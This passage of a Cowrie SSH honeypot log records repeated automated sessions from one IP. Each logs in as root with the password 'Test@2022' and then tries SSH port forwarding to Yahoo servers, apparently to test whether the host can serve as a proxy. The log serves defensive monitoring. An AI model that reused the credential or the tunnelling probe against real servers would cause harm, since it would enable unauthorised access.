","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.938763Z","src_ip":"213.209.150.239","session":"fc3e2e291539"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:30.221345Z","src_ip":"213.209.150.239","session":"fc3e2e291539"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":13414,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13414","sensor":"my-vps","timestamp":"2025-08-26T00:57:30.279660Z","session":"fc3e2e291539"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:30.336510Z","src_ip":"213.209.150.239","session":"fc3e2e291539"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":21055,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21055","sensor":"my-vps","timestamp":"2025-08-26T00:57:30.491037Z","session":"fc3e2e291539"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:30.547739Z","src_ip":"213.209.150.239","session":"fc3e2e291539"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:30.605238Z","src_ip":"213.209.150.239","session":"fc3e2e291539"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60656,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba9c0627b837","protocol":"ssh","message":"New connection: 213.209.150.239:60656 (1.2.3.4:22) [session: ba9c0627b837]","sensor":"my-vps","timestamp":"2025-08-26T00:57:30.660666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:30.661514Z","src_ip":"213.209.150.239","session":"ba9c0627b837"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:30.717851Z","src_ip":"213.209.150.239","session":"ba9c0627b837"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:30.999802Z","src_ip":"213.209.150.239","session":"ba9c0627b837"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":19988,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:19988","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.057127Z","session":"ba9c0627b837"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.113749Z","src_ip":"213.209.150.239","session":"ba9c0627b837"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":11765,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:11765","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.267032Z","session":"ba9c0627b837"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.324018Z","src_ip":"213.209.150.239","session":"ba9c0627b837"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.381357Z","src_ip":"213.209.150.239","session":"ba9c0627b837"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60705,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5419e79b28e","protocol":"ssh","message":"New connection: 213.209.150.239:60705 (1.2.3.4:22) [session: c5419e79b28e]","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.437066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.438275Z","src_ip":"213.209.150.239","session":"c5419e79b28e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.495068Z","src_ip":"213.209.150.239","session":"c5419e79b28e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.777615Z","src_ip":"213.209.150.239","session":"c5419e79b28e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":15853,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:15853","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.835305Z","session":"c5419e79b28e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:31.892046Z","src_ip":"213.209.150.239","session":"c5419e79b28e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":2909,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2909","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.047010Z","session":"c5419e79b28e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.103709Z","src_ip":"213.209.150.239","session":"c5419e79b28e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.162164Z","src_ip":"213.209.150.239","session":"c5419e79b28e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60753,"dst_ip":"1.2.3.4","dst_port":22,"session":"214b2fd3b6b9","protocol":"ssh","message":"New connection: 213.209.150.239:60753 (1.2.3.4:22) [session: 214b2fd3b6b9]","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.208328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.209168Z","src_ip":"213.209.150.239","session":"214b2fd3b6b9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.256278Z","src_ip":"213.209.150.239","session":"214b2fd3b6b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.491690Z","src_ip":"213.209.150.239","session":"214b2fd3b6b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":6263,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6263","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.539865Z","session":"214b2fd3b6b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.587119Z","src_ip":"213.209.150.239","session":"214b2fd3b6b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":28740,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28740","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.725608Z","session":"214b2fd3b6b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.773015Z","src_ip":"213.209.150.239","session":"214b2fd3b6b9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.821008Z","src_ip":"213.209.150.239","session":"214b2fd3b6b9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60792,"dst_ip":"1.2.3.4","dst_port":22,"session":"0640de17b0bc","protocol":"ssh","message":"New connection: 213.209.150.239:60792 (1.2.3.4:22) [session: 0640de17b0bc]","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.867180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.868131Z","src_ip":"213.209.150.239","session":"0640de17b0bc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:32.915677Z","src_ip":"213.209.150.239","session":"0640de17b0bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.150988Z","src_ip":"213.209.150.239","session":"0640de17b0bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":18455,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:18455","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.199813Z","session":"0640de17b0bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.247334Z","src_ip":"213.209.150.239","session":"0640de17b0bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":348,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:348","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.385754Z","session":"0640de17b0bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.433103Z","src_ip":"213.209.150.239","session":"0640de17b0bc"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.481064Z","src_ip":"213.209.150.239","session":"0640de17b0bc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60828,"dst_ip":"1.2.3.4","dst_port":22,"session":"262c66efb525","protocol":"ssh","message":"New connection: 213.209.150.239:60828 (1.2.3.4:22) [session: 262c66efb525]","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.536758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.537845Z","src_ip":"213.209.150.239","session":"262c66efb525"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.594320Z","src_ip":"213.209.150.239","session":"262c66efb525"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.876458Z","src_ip":"213.209.150.239","session":"262c66efb525"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":14118,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:14118","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.934248Z","session":"262c66efb525"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:33.991009Z","src_ip":"213.209.150.239","session":"262c66efb525"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":7404,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7404","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.147047Z","session":"262c66efb525"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.203677Z","src_ip":"213.209.150.239","session":"262c66efb525"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:34.261172Z","src_ip":"213.209.150.239","session":"262c66efb525"}
